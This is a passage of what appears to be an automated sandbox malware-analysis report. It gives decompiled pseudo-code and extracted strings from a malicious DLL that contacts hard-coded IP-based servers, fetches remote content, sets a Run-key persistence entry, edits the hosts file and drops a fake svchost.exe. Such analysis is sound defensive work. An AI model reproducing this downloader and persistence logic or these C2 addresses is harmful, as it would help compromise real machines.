						_t102 = _t102 + 0xc;
						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
						goto L5;
					} else {
						goto L7;
					}
					do {
						L7:
						_t67 = _t82;
						asm("cdq");
						_t95 = 2;
						_t86 = _t67 % _t95;
						__eflags = _t67 % _t95;
						if(_t67 % _t95 == 0) {
							_t32 = _t82 + _t71;
							 *_t32 =  *(_t82 + _t71) + 0x4b;
							__eflags =  *_t32;
						} else {
							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
						}
						_t82 = _t82 + 1;
						__eflags = _t82 - _v8;
					} while (_t82 < _v8);
					goto L11;
				}
			}

0x10008286
0x10008294
0x1000829b
0x1000829d
0x100082a6
0x100082a8
0x100082b8
0x100082ba
0x100082bc
0x100082ca
0x100082d4
0x100082e0
0x100082e8
0x100082f7
0x1000830a
0x1000830f
0x10008312
0x10008314
0x10008314
0x10008328
0x1000832a
0x10008333
0x10008335
0x10008336
0x10008339
0x10008344
0x10008344
0x10008344
0x10008346
0x10008348
0x10008350
0x10008356
0x10008358
0x10008359
0x10008364
0x1000835b
0x10008361
0x10008361
0x1000836f
0x10008374
0x10008375
0x1000837d
0x1000837e
0x10008381
0x1000838f
0x10008394
0x1000839a
0x1000839d
0x00000000
0x00000000
0x1000839f
0x100083a5
0x00000000
0x100083b0
0x100083b0
0x100083b2
0x100083b4
0x100083d2
0x100083d8
0x100083db
0x100083dc
0x100083de
0x100083e3
0x100083eb
0x100083ed
0x100083ee
0x100083f7
0x100083fd
0x100083fd
0x100083ee
0x1000840c
0x10008411
0x10008423
0x00000000
0x00000000
0x00000000
0x00000000
0x100083b6
0x100083b6
0x100083b6
0x100083ba
0x100083bb
0x100083bc
0x100083be
0x100083c0
0x100083c8
0x100083c8
0x100083c8
0x100083c2
0x100083c2
0x100083c2
0x100083cc
0x100083cd
0x100083cd
0x00000000
0x100083b6

APIs

LdrInitializeThunk.NTDLL ref: 100082E8
LdrInitializeThunk.NTDLL ref: 100082FF
Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
wsprintfA.USER32 ref: 100083F7

Strings

8.8.8.8, xrefs: 10008400
XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
127.0.0.1, xrefs: 10008405
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
http://107.163.56.232:18963/main.php, xrefs: 10008364

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk$Sleepwsprintf
String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
API String ID: 2795264321-515792873
Opcode ID: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
Opcode Fuzzy Hash: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55

Uniqueness

Uniqueness Score: -1.00%

Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void _v67;
				char _v68;
				void _v327;
				char _v328;
				char _v587;
				char _v588;
				void _v4683;
				signed char _v4684;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t47;
				void* _t48;
				void* _t49;
				signed int _t52;
				signed int _t56;
				void* _t58;
				void* _t67;
				void* _t71;
				void* _t79;

				_t79 = __eflags;
				_t60 = __edx;
				_t51 = __ecx;
				E1000CD20(0x1248, __ecx);
				E100051D3(_t51, __edx, _t79, __fp0);
				_v68 = _v68 & 0x00000000;
				_t52 = 0xf;
				memset( &_v67, 0, _t52 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
				_v4684 = _v4684 & 0x00000000;
				memset( &_v4683, 0, 0x3ff << 2);
				asm("stosw");
				asm("stosb");
				E10005318(0, _t79,  &_v4684);
				_v328 = _v328 & 0x00000000;
				_t56 = 0x40;
				_v588 = _v588 & 0x00000000;
				memset( &_v327, 0, _t56 << 2);
				asm("stosw");
				asm("stosb");
				_t58 = 0x40;
				_t67 =  &_v587;
				memset(_t67, 0, 0 << 2);
				_t68 = _t67 + _t58;
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
				0x10038f08( &_v328, 0);
				asm("insd");
				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
				_push(L"Win32_process");
				_push(L"ROOT\\CIMv2");
				 *0x10015fd4 = 0;
				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
				_t80 = _t47;
				if(_t47 != 0) {
					_push(_t47);
					_push(0);
					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
					 *0x10015ff4 = _t47;
					if(_t47 != 0) {
						_t48 =  *0x10015fd8; // 0x0
						 *_t48 = 0;
						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
						 *0x10015fd4 =  *0x10015fd4 + 1;
						return _t49;
					}
				}
				return _t47;
			}

APIs

wsprintfA.USER32 ref: 1000574F

Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0

wsprintfA.USER32 ref: 100057B1
wsprintfA.USER32 ref: 100057C5
PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835

Strings

c:\windows\system32\drivers\%s\%s, xrefs: 100057BF
%s\%s, xrefs: 10005749
ROOT\CIMv2, xrefs: 100057F2
Win32_process, xrefs: 100057ED
c:\windows\system32\drivers\%s, xrefs: 100057AB

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk$wsprintf$CreateFilePrintThread
String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
API String ID: 2056782399-1421401311
Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91

Uniqueness

Uniqueness Score: -1.00%

Function 10005989 Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t39;

				_t50 = __eflags;
				_t32 = __edx;
				_t27 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__ecx);
				_push(__ebx);
				_push(__ebp);
				_push(__esi);
				_push(__edi);
				wsprintfA(0x100165b0, "%s", "12071239");
				0x10031e13();
				 *_t34(0, 0x100165c8, 0x104);
				 *_t34( *0x10016adc, 0x100166cc, 0x104);
				E1000CD0E(_t27, 0x100167d0);
				0x100426e9(0x100166cc);
				asm("arpl [eax+0x57530020], ax");
				wsprintfA(0x100168d4, "%s\\%s", 0x100167d0, 0x5c);
				wsprintfA(0x100169d8, "%s\\version.txt", 0x100167d0);
				_t17 = E1000CCAE(wsprintfA("F896SD5DAE", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, 0x100167d0,  *0x1000e248, 0x100166cc, _t50, __fp0, 0x84);
				_a16 = _t17;
				_a28 = _a28 & 0x00000000;
				_t51 = _t17;
				if(_t17 == 0) {
					_t39 = 0;
					__eflags = 0;
				} else {
					_t27 = _t17;
					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
				}
				_a28 = _a28 | 0xffffffff;
				_t6 = _t39 + 0x44; // 0x44
				E1000CD0E(_t27, 0x10016af0);
				if(_t39 != 0) {
					 *((intOrPtr*)( *_t39))(1);
				}
				_t20 = 1;
				 *[fs:0x0] = _a20;
				return _t20;
			}

0x10005989
0x10005989
0x10005989
0x1000598e
0x10005993
0x10005994
0x10005995
0x10005996
0x100059a2
0x100059ae
0x100059b1
0x100059c6
0x100059d5
0x100059de
0x100059e6
0x100059eb
0x100059fb
0x10005a08
0x10005a20
0x10005a28
0x10005a2c
0x10005a31
0x10005a33
0x10005a40
0x10005a40
0x10005a35
0x10005a35
0x10005a3c
0x10005a3c
0x10005a42
0x10005a47
0x10005a50
0x10005a59
0x10005a61
0x10005a61
0x10005a69
0x10005a6e
0x10005a76

APIs

wsprintfA.USER32 ref: 100059AE
wsprintfA.USER32 ref: 100059FB
wsprintfA.USER32 ref: 10005A08
wsprintfA.USER32 ref: 10005A19

Strings

%s\version.txt, xrefs: 100059FE
107.163.56.251:6658, xrefs: 10005A0A
%s\%s, xrefs: 100059F1
F896SD5DAE, xrefs: 10005A14
M%s, xrefs: 10005A0F
12071239, xrefs: 1000599D, 100059A3

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$F896SD5DAE$M%s
API String ID: 2111968516-4006945637
Opcode ID: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
Opcode Fuzzy Hash: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66

Uniqueness

Uniqueness Score: -1.00%

Function 1000600F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 100060BB
LdrInitializeThunk.NTDLL ref: 100060CE
LdrInitializeThunk.NTDLL ref: 100060DB

Strings

wininet.dll, xrefs: 10006028
WinSta0\Default, xrefs: 100060EF
GetUrlCacheEntryInfoA, xrefs: 1000605D
urlmon.dll, xrefs: 10006021
URLDownloadToCacheFileA, xrefs: 10006052

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
API String ID: 2994545307-1569318151
Opcode ID: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
Instruction ID: 60b119b73ed59b85f20aa855cf1e8ee1c5a7c8f5b848a72e73bb8641c22c9667
Opcode Fuzzy Hash: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
Instruction Fuzzy Hash: 8C316FB690065CBAEB11DBA4CC45FDF7F7DEF08341F4400A6F208AA181E7316A458EA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v3;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				void _v128;
				void _v383;
				signed char _v384;
				char _v644;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t44;
				signed short _t49;
				void* _t54;
				signed int _t59;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				void* _t74;
				void* _t77;
				intOrPtr _t78;
				char* _t81;
				void* _t88;

				_t88 = __eflags;
				_t70 = __edx;
				_t59 = 0xc;
				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
				_t31 = memcpy( &_v128, _t77, _t59 << 2);
				_t74 = _t77 + _t59 + _t59;
				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
				asm("sbb [ebp-0x72b68a40], al");
				_t81 =  &_v3;
				asm("clc");
				_v16 = 4;
				_v12 = 0xc8;
				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31);
				E10004092(_v8);
				_t78 = _a4;
				_push( &_v644);
				E1000CD0E(0, _t78);
				E100058A4(0, _t78);
				_t13 = _t78 + 0x60; // 0x128
				E10005ACA(_t88, _t13);
				_pop(_t62);
				_v80 = 0x40;
				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88);
				_t71 = _v68;
				_t63 = 0x14;
				_t44 = E1000CDB0(_v72, _t63, _t71);
				asm("adc edx, 0x0");
				_t18 = _t78 + 0x40; // 0x108
				E10003EF4(_t18, "%u MB", _t44 + 1);
				_t19 = _t78 + 0x80; // 0x148
				_t49 = E1000CD0E(_t63, _t19);
				0x1003e508("12071239", _t71, _t81,  &_v80);
				_v384 = _v384 & 0x00000000;
				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
				_t64 = 0x3f;
				memset( &_v383, 0, _t64 << 2);
				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
				asm("stosw");
				asm("stosb");
				_t54 = E10005CF7( &_v384, 0x100);
				_t67 = _t81;
				if(_t54 == 0) {
					__eflags = _t78 + 0xa0;
					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
				}
				_push( &_v384);
				return E1000CD0E(_t67, _t78 + 0xa0);
			}

APIs

___crtGetTimeFormatEx.LIBCMT ref: 10005E11

Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2

Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096

Strings

ProcessorNameString, xrefs: 10005E02
%u MB, xrefs: 10005E7E
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10005DC5
@, xrefs: 10005E57
12071239, xrefs: 10005E8F
http://107.163.56.232:18963/main.php, xrefs: 10005EF8

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: CloseFormatQueryTimeValue___crt
String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
API String ID: 271660946-279254293
Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55

Uniqueness

Uniqueness Score: -1.00%

Function 10008578 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v32;
				CHAR* _v72;
				void _v76;
				char _v80;
				char _v96;
				void _v355;
				char _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t35;
				void* _t36;
				void* _t38;
				signed int _t39;
				signed int _t41;
				void* _t43;
				void* _t51;
				void* _t57;

				_t57 = __eflags;
				_t43 = __edx;
				_t38 = __ecx;
				Sleep(0x2710);
				_v12 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=");
				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000);
				_push(0x300000);
				_push(0);
				_v8 = _t20;
				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000);
				_t50 = _t22;
				if(_t22 <= 0) {
					L1:
					Sleep(0x1b7740);
					goto L1;
				}
				_t39 = 0x40;
				_v356 = 0;
				_t24 = memset( &_v355, 0, _t39 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
				__eflags = 0;
				_t41 = 0x10;
				memset( &_v76, 0, _t41 << 2);
				_v80 = 0x44;
				_v72 = "wINsTA0\\dEFauLT";
				_v32 = 0;
				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
				_t35 = 1;
				return _t35;
			}

0x10008578
0x10008578
0x10008578
0x1000858f
0x100085a0
0x100085a4
0x100085ab
0x100085ac
0x100085ae
0x100085b1
0x100085bd
0x100085c2
0x100085c9
0x100085cb
0x100085d0
0x00000000
0x100085d0
0x100085d8
0x100085df
0x100085e5
0x100085e7
0x100085e9
0x100085fd
0x1000860e
0x10008616
0x1000861d
0x1000861e
0x10008623
0x1000863d
0x10008644
0x10008649
0x10008650
0x10008655

APIs

Sleep.KERNEL32(00002710), ref: 1000858F
Sleep.KERNEL32(001B7740), ref: 100085D0
wsprintfA.USER32 ref: 100085FD

Strings

c:\%d.log, xrefs: 100085F7
D, xrefs: 10008623
wINsTA0\dEFauLT, xrefs: 1000863D
aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 10008591

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep$wsprintf
String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
API String ID: 3195947292-2583752392
Opcode ID: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
Opcode Fuzzy Hash: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006D08 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10006D08(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void _v271;
				char _v272;
				void _v531;
				char _v532;
				void* __esi;
				signed int _t34;
				void* _t50;

				_t50 = __eflags;
				_t34 = 0x40;
				_v532 = 0;
				memset( &_v531, 0, _t34 << 2);
				asm("stosw");
				asm("stosb");
				E10003FF7(0x100166cc,  &_v532, 0x104);
				E1000406C(0x80000001, E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="), 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12);
				_push(0x40);
				_v272 = 0;
				memset( &_v271, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v272, "%s \"%s\",Dispatch", 0x100165c8, 0x100166cc);
				_push( &_v272);
				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, 0x100166cc) + 1);
				return E10004092(_v8);
			}

0x10006d08
0x10006d18
0x10006d21
0x10006d2c
0x10006d2e
0x10006d30
0x10006d3e
0x10006d6c
0x10006d71
0x10006d7c
0x10006d83
0x10006d85
0x10006d87
0x10006d99
0x10006da5
0x10006dbf
0x10006dd4

APIs

Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003

Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A

wsprintfA.USER32 ref: 10006D99
___crtGetTimeFormatEx.LIBCMT ref: 10006DBF

Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9

Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096

Strings

U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D5B
Disp, xrefs: 10006DB7
%s "%s",Dispatch, xrefs: 10006D93
REG_SZ, xrefs: 10006D55

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
String ID: %s "%s",Dispatch$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
API String ID: 1762869224-3950432356
Opcode ID: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
Opcode Fuzzy Hash: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4

Uniqueness

Uniqueness Score: -1.00%

Function 10004351 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
sleepCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t21;
				void* _t23;
				void* _t27;
				signed int _t29;
				void* _t31;
				char* _t38;
				void* _t40;
				void* _t41;
				signed int _t43;
				void* _t48;
				intOrPtr* _t49;
				CHAR** _t52;
				void* _t54;
				intOrPtr* _t55;

				_t60 = __fp0;
				_t47 = __edx;
				_t39 = __ecx;
				_t52 = "cmd.exe";
				0x10032ab5(__eax, _a8, _t52);
				_t59 = __eax;
				if(__eax == 0) {
					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
					if(__eflags != 0) {
						E10004318(_t19, __ecx, _a4);
						 *_t55 = 0x7d0;
						Sleep(??);
						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
						_pop(_t49);
						0x10041fa9();
						_pop(_t40);
						 *_t49(_t21);
						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
						_t41 = 1;
						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
						_t27 =  *_t49();
						Sleep(0x3e8);
						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
